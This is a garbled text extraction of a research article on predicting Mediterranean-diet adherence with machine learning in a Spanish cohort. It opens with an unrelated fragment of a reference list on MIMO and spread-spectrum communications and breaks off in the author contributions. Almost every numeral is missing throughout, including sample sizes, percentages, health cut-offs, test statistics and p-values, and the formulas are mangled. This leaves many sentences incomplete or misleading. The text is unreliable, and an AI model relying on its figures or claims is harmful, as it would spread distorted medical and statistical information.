] research on differential space-time coding technology in chen yuyan mimo-ofdm system [d]. shanghai: shanghai jiao tong university. . [ ] gan y h, ling c mow w h. complex lattice reduction algorithm for low-complexity full-diversity mimo detection[j]. ieee transactions on signal processing, , ( ): - . [ ] zu k, lamare r c, haardt m. generalized design of low-complexity block diagonalization type precoding algorithms for multiuser mimo systems[j]. ieee transactions on communications, , ( ): - . [ ] dong tao, jiang zhucheng, you xiao hu. optimization of channel estimation for spread spectrum system [j]. circuit and systems, - . [ ] f adachi,m sawahashi,h suda. wideband ds-cdma for next- generation mobile communications systems[j].ieee communicationsmagazine, ,( ): - . [ ] wang huihua, li baoping. m sequence generator [j]. journal of beijing electronics science and technology institute, , : - . [ ] liu zhenming.study on the cross correlation properties of m sequences [d].university of national defense science and technology, . [ ] cheng jianli, huang fuqing, tu jia, xu yitao. the soft spread spectrum technology based on the same spread spectrum code [a]., the youth work committee of the chinese communications society, the new development of the. communication theory and technology of the school of information engineering of north china university of technology - the twelfth national youth communications academic association (book below) [c]. china communications society school of information engineering, north china university of technology, : . [ ] ma yufeng, lv chengmin, song feng, sun jun. a research on the information hiding algorithm based on spread spectrum technology [a]. china communications society. the fifth academic annual conference of the china communications society, [c]. china communications society: : .[ ] ai bo. mimo communication system coding [m]. electronic industry press,. . [ ] chen hong.mimo-ofdm key technology research [d]. tianjin: tianjin university, . [ ] nie chunyan. creative judgment of claims in communication network technology category [n]. china intellectual property office, . [ ] ting ann. effective crm software. legacy systems can be accessed using integration technology.[j]. healthcare informatics, , ( ). [ ] [ ] joseph g. young. program analysis and transformation in mathematical programming[d]. rice university, . [ ] comeron j m, kreitman m. the correlation between synonymous and nonsynonymous substitutions in drosophila: mutation, selection or relaxed constraints[j]. genetics, , ( ). [ ] tao chongqiang, yang quan, yuan xiao. simulation study on spread spectrum communication system of m sequence, gold sequence and orthogonal gold sequence [j]. electronic design engineering, ( ): - . [ ] gu jingmin, liang tao, yu yong. a new mimo transmission power allocation algorithm research [a]. communication theory and new progress in signal processing - communication theory and signal processing annual conference paper, [c], . [ ] xiong yan. research on precoding technology of mimo multi-user broadcast channel [d]. beijing: beijing university of posts and telecommunications. . [ ] antenna selection technology in fang xiaoyong mimo system [d]. xi'an: xi'an electronic and science university,. . http://d.wanfangdata.com.cn/nstlqk_nstl_qk.aspx http://d.wanfangdata.com.cn/nstlqk_nstl_qk.aspx http://d.scholar.cnki.net/detail/sjpd _u/sjpd http://d.scholar.cnki.net/detail/sjpd _u/sjpd http://proquest.cnki.net/kcms/detail/detail.aspx?dbcode=pqdt&dbname=pqdt&filename=pqdt &v=mdm mdjjr r ttr bvvxbvq svrncmdxee hrddxuutyawzadu rxlybfu akplvnnytlr ugvyrzridg nckl rmjl http://proquest.cnki.net/kcms/detail/detail.aspx?dbcode=pqdt&dbname=pqdt&filename=pqdt &v=mdm mdjjr r ttr bvvxbvq svrncmdxee hrddxuutyawzadu rxlybfu akplvnnytlr ugvyrzridg nckl rmjl http://d.scholar.cnki.net/detail/sjpd _u/sjpd http://d.scholar.cnki.net/detail/sjpd _u/sjpd http://d.scholar.cnki.net/detail/sjpd _u/sjpd identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques alba arceo-vilas ,*, carlos fernandez-lozano , ,*, salvador pita ,†, sonia pértega-díaz and alejandro pazos , clinical epidemiology and biostatistics research group,, instituto de investigación biomédica de a coruña (inibic), complexo hospitalario universitario de a coruña (chuac), sergas, universidade da coruña, a coruña, spain department of computer science and information technologies, faculty of computer science, citic-research center of information and communication technologies, universidade da coruña, a coruña, spain grupo de redes de neuronas artificiales y sistemas adaptativos. imagen médica y diagnóstico radiológico (rnasa-imedir). instituto de investigación biomédica de a coruña (inibic). complexo hospitalario universitario de a coruña (chuac), sergas, universidade da coruña, a coruña, spain * these authors contributed equally to this work. † deceased author. abstract food consumption patterns have undergone changes that in recent years have resulted in serious health problems. studies based on the evaluation of the nutritional status have determined that the adoption of a food pattern-based primarily on a mediterranean diet (md) has a preventive role, as well as the ability to mitigate the negative effects of certain pathologies. a group of more than adults aged over years from our cohort in northwestern spain was surveyed. under our experimental design, experiments were run with four different machine-learning algorithms and the predictive factors most relevant to the adherence of a md were identified. a feature selection approach was explored and under a null hypothesis test, it was concluded that only measures were of relevance, suggesting the strength of this observational study. our findings indicate that the following factors have the highest predictive value in terms of the degree of adherence to the md: basal metabolic rate, mini nutritional assessment questionnaire total score, weight, height, bone density, waist-hip ratio, smoking habits, age, edi-od, circumference of the arm, activity metabolism, subscapular skinfold, subscapular circumference in cm, circumference of the waist, circumference of the calf and brachial area. subjects bioinformatics, artificial intelligence, data mining and machine learning keywords feature selection, nutritional status, machine learning, mediterranean diet, support vector machines, nutrition disorders introduction the economic development, urbanisation and industrialisation worldwide have changed individuals’ eating habits and lifestyles, such as smoking, excessive consumption of alcohol, sedentary lifestyle and stress, leading to a nutritional transition which its principle cost in the health sector, is the appearance of non-transmissible chronic diseases. how to cite this article arceo-vilas a, fernandez-lozano c, pita s, pértega-díaz s, pazos a. . identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques. peerj comput. sci. :e doi . /peerj- cs. submitted july accepted july published july corresponding author carlos fernandez-lozano, carlos.fernandez@udc.es academic editor yu-dong zhang additional information and declarations can be found on page doi . /peerj-cs. copyright arceo-vilas et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. mailto:carlos.�fernandez@�udc.�es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ a consequence of the alteration of dietary patterns is what has been called ‘epidemic obesity’, defined by the world health organisation (who) as the first non-viral epidemic of the st century, with million obese people worldwide (finucane et al., ; krzysztoszek, wierzejska & zielińska, ) affecting more than % of the adult population in spain (lópez-sobaler et al., ; anta et al., ; rodriguez rodriguez et al., ). the assessment of nutritional status of a population is one of the best indicators of the health status of the said population, being a methodology that must include three important aspects: a global assessment, a study of the dimension and a study of body composition (ravasco, anderson & mardones, ). with adequate interpretation of the findings, appropriate therapeutic measures should be taken to correct deviations from normality. in the context of nutrition and public health, the mediterranean diet (md) has been forged over the centuries, being characterised by cereal, olive oil, low saturated fats and meat, moderate consumption of dairy and a regular and moderate intake of wine, being a lifestyle in accordance with geographic, climatological, orographic, cultural and environmental conditions within the countries and regions that surround the mediterranean sea (pérez & aranceta, ). there is an increasing interest in the study of the preventive role of md and also as a treatment for various pathologies associated with chronic inflammation, such as metabolic syndrome, diabetes mellitus, cardiovascular disease (cvd), neurodegenerative diseases, breast cancer and psycho-organic deterioration, leading to greater longevity and better quality of life (dussaillant et al., ; chrysohoou et al., ; trichopoulou, ; serra-majem, roman & estruch, ; estruch et al., ; sofi et al., ; della camera et al., ). moreover, the importance of md has also been identified as a potential element contributing to the prevention of breast cancer (shapira, ) or in patients carrying the brca mutation (bruno et al., ). in ; unesco declared this diet an intangible cultural heritage of humanity (unesco, ). numerous studies have been published over the past decades, showing the relationship between md intake and cvd (martínez-gonzález et al., ; widmer et al., ), and meta-analyses that relate it to general health status (sofi et al., ). in the greek cohort epic (european prospective investigation into cancer and nutrition study) a -point increase in adherence to this diet was associated with a % reduction in cvd mortality (sofi et al., ). additionally, the analysis of a sub-cohort of , individuals over years old, with a history of myocardial infarction showed that a greater adherence to md had an % drop in overall mortality (lack et al., ). other studies have confirmed these associations, including the follow-up of a spanish cohort of , adults with coronary heart disease. after years, it was observed that two points of increase in adherence to md were associated with a % decrease in coronary risk (trichopoulou et al., ). eating disorders are linked to a distorted perception of one’s own body image, as well as to body dissatisfaction. the importance of a study on body dissatisfaction is due to the fact that recent investigations have confirmed that alterations in body image have a causal arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participation in an eating disorder, rather than being secondary to it (míguez bernárdez et al., ). body image is considered a qualitative approximation to the nutritional status of the individual (sámano et al., ) and can be determining for their nutritional management (martínez-gonzález et al., ). one of the main fields of application of machine-learning (ml) techniques since its origins is in the field of biomedicine, finding previously published studies in related areas such as biomedical image (fernandez-lozano et al., b), characterisation of different types of carcinomas (kim et al., ), measurement of activity in genetic networks (hu et al., ), deformable models for image comparison (rodriguez et al., ), gene selection, and classification of microarray data (díaz-uriarte & de andrés, ), to name a few. moreover, due to the great versatility of ml techniques, they have been used in a wide variety of application areas, to discover hidden patterns in the datasets: identification and authentication of tequilas (pérez-caballero et al., ), wearable sensor data fusion (kanjo, younis & sherkat, ), predicting the outcomes of organic reactions (skoraczyñski et al., ), animal behaviour detection (pons, jaen & catala, ) or to measure the visual complexity of images (machado et al., ). in particular, ml techniques have proven to be able to uncover unimaginable relationships in very diverse fields of application, such as image or voice recognition, sentiment analysis or language translation (li, li & wu, ; de viñaspre & oronoz, ). the main objective of this work is the development of ml models for the prediction of the degree of adherence to the md. to this end, information on different anthropometric and socio-demographic variables, nutritional status and self-perception of body image is used in order to identify which of the variables have a greater influence and are key in the adherence to a healthy diet such as md, allowing our patients to improve their quality of life and to reduce the negative effects of well-known and related diseases. taking into account all of the above, the experimental methodology proposed in the development of this study is based on the collection and generation of data to be analysed with our cohort in galicia (spain), as well as on the use of ml techniques. the purpose is to extract and explain the underlying information in the data and determine which of these variables are the most important to classify people as having either a good or poor adherence to the md. as mentioned before, there are several health benefits related to this particular food diet, especially for: chronic inflammation, metabolic syndrome, diabetes mellitus, cvd, neurodegenerative diseases, cancer and psycho-organic deterioration, moreover leading to greater longevity and better quality of life. thus, this study is relevant for understanding how to measure the degree of adherence, in order to ensure the aforementioned benefits. the structure of the article is as follows: in the materials and methods section, the subjects are presented, the variables are measured for each of them. next, the machine learning and feature selection techniques are described, along with the experimental design followed to ensure that the results are reproducible and representative of the studied arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ problem. in the next section, the results are presented and discussed, and the final section of the article includes the conclusions of the work. materials and methods the present study was structured as follows. initially, a population from our cohort was selected to carry out the study; the population was grouped into two categories: with high and low degree of adherence to the md. once the set of the population on which the study will be carried out has been identified, the information is collected from each of the users of the health system. the type of study carried out will be described below, as well as the sample size will be justified and all measurements collected will be explained in detail. once the dataset is generated, it will be analysed with four different ml techniques and a feature selection phase will be applied for dimensionality reduction. population and data description this is an observational prevalence study, conducted in northwestern spain (municipality of cambre, a coruña, spain), which included a randomly selected population aged years and over. the sampling population consisted of individuals residing in cambre, identified through the national health system card census. in spain, the national health system has universal coverage, and almost all spanish citizens are beneficiaries of public healthcare services. the sample size was calculated taking into account the total population of the municipality (n ¼ ; ). after stratification by age and gender, (n ¼ ) persons were selected to participate in the study. sample size was estimated using the single proportion formula, with % confidence interval. a sample size of (n ¼ ) subjects was estimated based on an adherence to md rate of %. precision was set at . % and percentage of losses at %. population data is shown in table . table population data of the municipality of cambre (a coruña) for the year and sample data according to age and sex. age groups population sample total men women total men women – , , ( . %) , ( . %) ( . %) ( . %) – , , ( . %) , ( . %) ( . %) ( . %) – , ( . %) ( . %) ( . %) ( . %) – , ( . %) ( . %) ( . %) ( . %) – , ( . %) ( . %) ( . %) ( . %) total ( – ) , , , – , ( %) ( . %) ( %) ( %) – ( . %) ( . %) ( . %) ( %) – ( . %) ( . %) ( . %) ( %) – ( . %) ( . %) ( %) ( %) -more ( . %) ( . %) ( . %) ( %) total ( and more) , , , arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a personal interview was arranged with each individual. after obtaining their permission and written consent, a trained nurse proceeded to the measurement of anthropometric variables and to the collection of the necessary data to cover the questionnaires. the patients who could not go to the health centre due to personal or displacement reasons and those who suffer from a cognitive impairment, making it impossible for them to perform the study, were excluded. the study received written approval from the regional ethics committee for clinical research (code / ceic galicia). the information described below was collected from each selected subject: socio- demographic variables: age, gender, level of education, marital status and relationships of coexistence; prevalence of arterial hypertension and smoking: the systolic and diastolic blood pressure of each patient was recorded at the beginning and at the end of the visit, obtaining the prevalence of arterial hypertension; the smoking habit was recorded according to self-reported information. anthropometric variables: the anthropometric parameters allow us to know the state of the protein and caloric reserves, besides providing guidance to the health professional about the consequences of the imbalances in these reserves. all measurements were made during the same session, to avoid variations in the environmental or biological conditions. for the measurement of weight and size, the person was barefoot and with light clothing; an mb- t plus asimed scale-rod was used with an accuracy of grams (weight) and mm (size). bmi was obtained by means of the bmiratio ¼ weightðkgÞheightðm Þ, and grouped according to the who classification of bmi , : kgm : low weight; . – . kg m : normal weight; – . kg m : overweight, and � kgm : obesity. the waist and hip circumference was measured with an inelastic tape measure with the patient standing upright, the abdomen relaxed, the upper limbs hanging at the sides, and with the feet and knees joined together. the waist circumference was measured by taking the mid-point between the lower costal margins and the iliac crests, as it is considered a risk factor for cvd when it is wider than cm in women and wider than cm in men, and a very high risk if it exceeds cms and cms, respectively (alberti et al., ). the hip circumference was measured as the maximum circumference around the buttocks. based on these two values, the waist-hip ratio was calculated using the cut-off points proposed by the who, where normal levels of . are found in women and one in men, higher values indicating abdominal visceral obesity, which is associated with increased cardiovascular risk (jover, ). the calf circumference was measured in the widest section of the ankle-knee distance (cuff area) showing a good correlation with fat-free mass and muscle strength (rolland et al., ; barbosa murillo et al., ; bonnefoy et al., ). the measurement was carried out with an inextensible tape measure in cm. subscapular skin fold, this fold measures truncal obesity. the measurement is made one centimetre below the lower angle of the scapula, following the natural furrow of the skin. arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the scapula protrudes when the arm is carefully placed behind the back and the lower angle can be located this way. the measurement of the fold will be diagonally over an angle of ° to ensure the correct thickness measurement. the plicometer forceps should be applied cm in the inferolateral position to the thumb and finger that lifts the fold. to assess the amount of subcutaneous adipose tissue, the skin folds were measured in millimetres in the tricipital, bicipital, subscapular and suprailiac areas. a digital calliper trim metre was used, including a double layer of skin and underlying adipose tissue, always avoiding the muscle. the tricipital skinfold was measured longitudinally, at the back of the non-dominant upper limb, at the midpoint between acromion and olecranon, with the limb relaxed, parallel to the axis of the arm; the bicipital fold was measured at the same point as the tricipital, but on the under arm. the circumference of the arm was measured with an inextensible anthropometric tape measure in cm. the measurement was taken at the midpoint of the non-dominant arm, in the same place where the tricipital skinfold was measured and without compression with the anthropometric tape. once the data of the different measurements were obtained, the mid-arm muscle circumference was found, with which the skeletal muscle mass of the patients (protein compartment) was known and expressed in cm. the arm muscle area indicated that the muscle compartment was based on the brachial circumference and tricipital skinfold measurements. the fat area of the arm indicated that the patient’s fatty compartment used the total brachial area and the muscular area of the arm. the adipose muscular index, which evaluates the nutritional status from the adipose and muscular areas of the arm, was also calculated, being essentially applied in the assessment of obesity. for the determination of body fat percentage by electrical bio-impedance, a beurer and bg model bio-impedance metre was used, with a maximum capacity of kg and a precision of . % for body fat, body water and muscle percentage, and g for body weight, according to the information provided by the manufacturer. these methods are based on physical principles, such as the different ability of conduction or resistance that the tissues show to the passage of an electric current, with greater conductivity of the lean tissues than the fatty ones (norman et al., ). thus, by means of bio-impedance, the following values were obtained: weight, fat mass, liquid mass, muscle mass, bone density, basal metabolic rate (bmr) and activity metabolism. data on socio-demographic variables, such as age, gender (male/female), cohabitation (with whom the live), prevalence of current smokers, ex smokers (patient stopped smoking more than months before entering the study) and non-smokers were estimated. additionally, blood pressure was recorded. adherence to the md consumption of a characteristic food pattern of md is associated with numerous health benefits. these benefits are attributed to bioactive compounds that exert synergistic effects and decrease the risk for development of chronic diseases. in order to assess the quality of dietary habits (adherence to a mediterranean dietary pattern), the md adherence test was used (estruch et al., ). it is a questionnaire arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ consisting of fourteen quick questions that allow us to understand whether participants’ usual diet can be considered as following the parameters of the md. each question answered affirmatively adds a point. it is considered that a person correctly follows the md when their score is equal to or greater than nine points. the assessment of nutritional status was determined using the mini nutritional assessment (mna) questionnaire (estruch et al., ). it is a validated method which, through eighteen short questions, evaluates anthropometric measures, dietary habits, lifestyle, pharmacological treatments and mobility, and performs a subjective evaluation of health and nutritional status. the total value of the mna scale is thirty points, a score < being considered malnutrition, there is a risk of malnutrition between and , , and well nourished subjects obtain scores of points and higher. a measure of subjective weight is included by asking: ‘i consider that my weight is: (a) higher than normal, (b) normal, (c) lower than normal’, following the model proposed in (espina et al., ). based on the answer, the population is classified into three groups: ‘fairly subjective weight’ those who believe to be at an ideal weight, ‘more subjective kilograms’ for those who believe that they are overweight and ‘less subjective kilograms’ for those who think they weigh less than they should. two of the eleven sub-scales of garner’s eating disorder inventory (edi- ) (garner, ) were used to study body image: body dissatisfaction (edi-ic) and obsession for thinness (edi-od), as they evaluate aspects directly related to perceptual alterations. the body dissatisfaction sub-scale (edi-ci) measures the dissatisfaction of the subject with the general shape of their body or with those parts of the body that most concern those with eating disorders (stomach, hips, thighs, buttocks). the thinness obsession sub-scale (edi-o) measures concern about weight, diets and fear of getting fat. this questionnaire was validated in spain by (corral et al., ). the fourteen items of these two sub-scales were mixed in the questionnaire to avoid the subjects guessing the construct being evaluated. all items were answered and corrected according to the form proposed in the questionnaire manual. the md adherence test was used to determine the degree of adherence to the md, being a short specific questionnaire of fourteen items validated for the spanish population and used by the md prevention group (predimed) (martínez-gonzález et al., ). machine learning and statistical analysis the authors tested different ml techniques for solving this problem, using cross-validation techniques to avoid over-training, while ensuring that the generalised capability of the model is the best possible, as well as different runs of the experiments to check the behaviour of the techniques. thus, all experiments were repeated ten times to check the stability of the results and the observed deviation between the experiments was small, as shown in the results section. in particular, a tenfold cross validation was used to divide the dataset in such a way that nine random partitions were used to train and one to validate the results, each time taking a different subset for validation. in order to compare the performance of the ml techniques, the area under the receiver operating characteristic curve (auroc) was used. this is a combined arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ measurement which, besides being independent of the threshold used, includes both type i and type ii errors, ensuring that it is not conditioned by differences in the total number of cases of each class (fawcett, ). an experimental design was employed (fernandez-lozano et al., a), allowing us to divide the data using a cross-validation technique which ensured that the performance results obtained, as mentioned above, were not skewed. that is they were adjusted to the data, and researchers are able to identify which of the hyper-parameters are most suitable to find the best model with each ml techniques, according to its particular hyper-parameter configuration. to this end, the programming environment r (r core team, ) and the package mlr (bischl et al., ) were used, which also allowed us to perform the considered experimental design. in addition, another of the objectives pursued by this study was to find as few variables as possible that would yield a performance value as high as possible, preferably at least equal to that obtained using all available variables. this is basically a feature selection approach where the main aims are the following: avoid overfitting and improve model performance, to provide faster and more cost-effective models, and moreover to gain a deeper insight into the underlying processes that generated the data as mentioned in (saeys, inza & larrañaga, ). there are three approaches in ml to perform this process and the use of a filter approximation was chosen, for its velocity and independence of the classifier (saeys, inza & larrañaga, ). in general, performing this feature selection process helps to reduce inherently the present noise in such datasets. the final step of our experimental analysis was a null hypothesis test for choosing the best model in order to ensure whether the performance of a particular ml technique is statistically better than the others or not. in our case, as there were more than two repeated measures, an anova or a friedman test should be considered. in particular, three different conditions should be checked: normality, independence and homoscedasticity. if our results fulfil the three conditions, a parametric test is applicable, and the anova one should be considered, otherwise the non-parametric version, the friedman test. finally, a post hoc procedure had to be used in order to correct the p-values for multiple testing. machine learning techniques for classification problems a large number of experiments were carried out in an attempt to identify the best ml model able to solve the problem and to ensure that the results are reproducible, real and obtained under equal conditions. in addition, the search space was explored for the best possible parameters for each technique in the same way, so that all techniques could have the same possibilities of exploration across the same subsets of data and avoid the over fit that could occur. in particular, the following well-known state-of-the-art techniques were implemented: random forest (rf) (breiman, ), support vector machines (svm) (cortes & vapnik, ; vapnik, ), elastic net (enet) (tibshirani, ; zou & hastie, ) and weighted k-nearest neighbours (knns) (hechenbichler & schliep, ). arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ random forest (breiman, ) is a state-of-the-art ml technique that was used in multiple domains with good results. one of its main strengths is that the results obtained are very easy to understand, it is based on very simple concepts and in general, although it is applied with little experience in the parametrisation of hyper-parameters, good results are obtained. this technique combines multiple decision trees, each of them tuned over a subset of bootstrapped data. in this way, rf combines each of the individual predictions of the decision trees into a global prediction that, in general, is more successful than any of the simple ones. of all the possible variables in the dataset, a number were randomly selected (with replacement) and a number of trees were constructed based on the set of examples used for the training phase and obtained from the previously selected subset. when there are classification problems, it is recommended to use a square root number of the total number of variables existing in the dataset. to explore the solution space in the best way possible, in our experiments we used a parameter domain that was adjusted by a grid search and that, for a number of trees ( , ), we explored randomly selected values of variables ( – ). in addition, values that varied ( – ) according to the size of the terminal nodes of the tree were explored. support vector machines (cortes & vapnik, ; vapnik, ) is also one of the ml techniques that have been commonly used in different domains in recent years and have obtained good results. in fact, along with rf, it is one of the algorithms considered state-of-the-art, easy to understand, and the results obtained are verifiable. in problems that occur during a study, the main objective of svm is to find the hyperplane that best separates the examples between high and low degree of adherence to the md and at the same time to maximise the distance of separation between both examples and the hyperplane. that is it attempts to find the separation hyperplane that generalises in the best possible way (burges, ). to achieve this goal, svm introduces a particular mathematical concept known as kernel: it is a mathematical function that allows the conversion of the input space into a higher dimension, which is used to transform a non-separable linear problem into one that is separable. there are different kernel functions, which in general could be interpreted as a measure of similarity between two objects ( ), and one of the most used is gaussian radial basis (rbf), because basically any surface can be obtained with this function ( ). in this case, the domain of the parameters used to search for the best model consists of a grid search of two different parameters. the first one (parameter c) is directly related to the model and is used as a balance between the classification errors and the simplicity of the decision surface, while the second (gamma parameter) is the free parameter of the gaussian function and in particular, svm is very sensitive to changes in this parameter. for both parameters, and according to the usual practice, values were evaluated in potencies of two between − and . to better understand this technique, the following reading materials are recommended (burges, ; vert, tsuda & schölkopf, ; cristianini & shawe-taylor, ). elastic net (tibshirani, ; zou & hastie, ) is based on lasso (penalised least squares method) and was specifically developed to solve some of the limitations encountered for this technique ( ). on the one hand, a grid search was performed on two arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different parameters, the alpha penalty parameter was searched (it has values in the range of – ) and in particular the following , . , . , . , . , . , . , . and . on the other hand, the best value of the lambda parameter was used, as recommended by the authors of the technique, from values less than or equal to one to negative powers of ten, in particular the following values were used: . , . , . , . , . finally, a simple knn (hechenbichler & schliep, ) assigned, through a decision rule, an unclassified example belonging to a class by frequency of occurrence to its k-most similar neighbouring examples. then, in accordance to the distance of minkowski for each of the examples and following the maximum accumulated kernel densities the weighted knn are identified (hechenbichler & schliep, ; samworth, ). in particular, neighbouring values of less than or equal to nine were used. therefore, this particular and improved implementation of a knn used kernel functions to measure the degree of similarity of the examples, as previously mentioned in the case of the svms. results the dataset has a total of variables employed to characterise the differences underlying in the data between high and low adherence to the md. the data has been standardised using the z-score formula to have a mean equal to zero and a standard deviation equal to . four different ml techniques were used to verify the results obtained, in an attempt to identify the technique that provides the best-performing results. initially, the analysis of the complete set of study variables is carried out. it can be seen in figs. a and b how the techniques present a fairly stable behaviour in the prediction. even a simple a priori technique such as knn obtains the best results of the entire experimental phase, indicating that almost all variables contain relevant information. in any case, in order to understand whether there is noise or contradictory or correlated information that may be hindering the learning process of the algorithms, a phase of dimensionality reduction will then be carried out. additionally, a process of feature selection was carried out to reduce the number of variables as much as possible, so that the results could remain similar without statistical differences, if not better, for those obtained using all variables. our approach is a filter feature selection using a t-test to quantify the correlation between each feature and the class (high or low adherence to the md) before the training process. three subsets of , and features were evaluated of the original ordering according to the highest p-value from the t-test. the average auroc results of the execution of the ten -fold cross-validation experiments are shown in fig. . as the number of features increases, there is a clear growing tendency in performance and obtained results in auroc with and features are very close to those obtained with the full dataset. in any case, a study should be conducted on whether the differences are statistically significant between the subsets of , variables and the full dataset to ensure that the subset with fewer features is statistically the best option. finally, as shown in fig. a, svm is the best model in three out of the four datasets, and manages to reach values closest to . in auroc. arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, as previously mentioned, a single mean measure is not enough and it is necessary to analyse the behaviour of the models during the whole experimental phase and to verify how stable they are, as shown in fig. b. figure b shows that if the number of variables is very small ( ), the models are skewed and there is a higher variability in the performance because there is not enough information in the data to find a good classification model. it is also important to note that the results obtained with and features showed that this variability was significantly reduced until reaching average and standard deviation values very similar to those obtained using all the variables. as observed in the two previous figures, the best results in auroc were obtained using svm. the same results in accuracy are shown in fig. . to check whether the difference between the three winning models (svm with , and all variables) is significant or not, a null hypothesis test was applied. following the experimental methodology proposed in (fernandez-lozano et al., a) for the normality fs− fs− fs− full . . . . d a ta se ts (a) . . . . a u r o c (b) machine learning algorithms rf svm glmnet knn fs− fs− fs− full figure summary of the performance (auroc) of the four ml techniques (rf, svm, glmnet and knn) for each one of the subsets of features. (a) average of the experiments for each size analysed and (b) boxplot of the results in order to check the behaviour of the techniques through the learning process. full-size doi: . /peerj-cs. /fig- arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ condition we used the shapiro–wilk test (shapiro & wilk, ), with a confidence level a ¼ : . with the null hipothesis that our results follow a normal distribution. the null hypothesis was not rejected with values w ¼ : and p‐value ¼ : , therefore our results did follow a normal distribution. next, a bartlett test (bartlett, ) was performed, with a confidence level a ¼ : and with the null hypothesis that our data were heterocedastic. the test result indicates that the null hypothesis should not be rejected with a value of barlett’s k-squared : with two degrees of freedom and p‐value ¼ : . the result of both tests indicates that a parametric anova test should be conducted, with a confidence level a ¼ : assuming the null hypothesis that our results are statistically equal. the results of the anova test indicates that we fail to reject the null hypothesis and the three ml models are statistically equal with an adjusted p‐value ¼ : . consequently, a -feature model should be considered (bmr, mna total score, weight, height, bone density, waist-hip ratio, smoker, age, edi-od, circumference of the arm, activity metabolism, subscapular skin fold, fs− fs− fs− full . . . d a ta se ts accuracy(a) fs− fs− fs− full . . . . f−measure(b) machine learning algorithms rf svm glmnet knn figure summary of the average performance of the experiments: (a) (accuracy) and (b) (f-measure) of the four ml techniques (rf, svm, glmnet and knn) for each one of the subsets of features. full-size doi: . /peerj-cs. /fig- arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ subscapular circumference in cm, circumference of the waist, circumference of the calf, brachial area) as the best-performing one, and half of the initial features that are not relevant for the svm were removed. discussion to check whether our results are relevant and are in accordance with what has been previously published, the state-of-the-art articles published on the topic were reviewed, in an attempt to identify the degree of adherence to the variables most related to a md. the search results led to previous studies that also found the variables identified by svm as the most important, in particular bmr (cutillas et al., ; careau, ; srivastava et al., ; bonfanti et al., ), mna total score (farias et al., ; zaragoza martí et al., ; abreu-reyes et al., ), weight and height (de la montaña miguélez et al., ; buckland, bach-faig & majem, ; ortega anta & lópez sobaler, ; travé & castroviejo, ), bone density (romero pérez & rivas velasco, ; savanelli et al., ; melaku et al., ; Štefan et al., ) or waist-hip ratio (downer et al., ; estruch et al., ; bertoli et al., ) and if the patient is a smoker (zaragoza martí et al., ; marventano et al., , grao-cruces et al., ). therefore, the results were contrasted, ensuring the ability of ml techniques to identify underlying patterns in the data. according to the feature selection process, the remaining predictors are not relevant for all the ml techniques. conclusions the first model based on ml that was proposed for the prediction of the degree of adherence to the md depended on information related to different anthropometric variables, socio-demographic variables, nutritional status and self-perception of body image. initially, experiments with four different ml methods were performed and feature selection techniques were applied to reduce the dimensionality of the problem. svm is the best-performing model according to the experimental design after a null hypothesis test, and our study found that using a feature selection approach, the number of features could be drastically reduced to (less than half of the initial number) achieving an equivalent performance value in auroc. the best model obtained was an svm with an rbf kernel as a decision function. the importance of each one of the predictors cannot be studied because a nonlinear svm is like a black box and the internal mapping function is unknown. furthermore, the weight vector cannot be explicitly computed. finally, our results are in accordance with the findings of previous publications and have primarily served to establish new factors related to the degree of adherence to the md. additional information and declarations funding this work is supported by the “collaborative project in genomic data integration (ciclogen)” pi / funded by the carlos iii health institute from the spanish national plan for scientific and technical research and innovation – and arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the european regional development funds (feder)—“a way to build europe”. this project was also supported by the general directorate of culture, education and university management of xunta de galicia (ref. ed g/ , ed d / ), the “galician network for colorectal cancer research” (ref. ed d / ), competitive reference groups (ref. ed c / ) and the european regional development funds (feder)—“a way to build europe”. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: collaborative project in genomic data integration (ciclogen): pi / . carlos iii health institute from the spanish national plan for scientific and technical research and innovation – . european regional development funds (feder)—“a way to build europe”. general directorate of culture, education and university management of xunta de galicia: ed g/ and ed d / . galician network for colorectal cancer research: ed d / . competitive reference groups: ed c / . european regional development funds (feder)—“a way to build europe”. competing interests the authors declare that they have no competing interests. author contributions � alba arceo-vilas performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � carlos fernandez-lozano conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � salvador pita conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. � sonia pértega-díaz conceived and designed the experiments, analysed 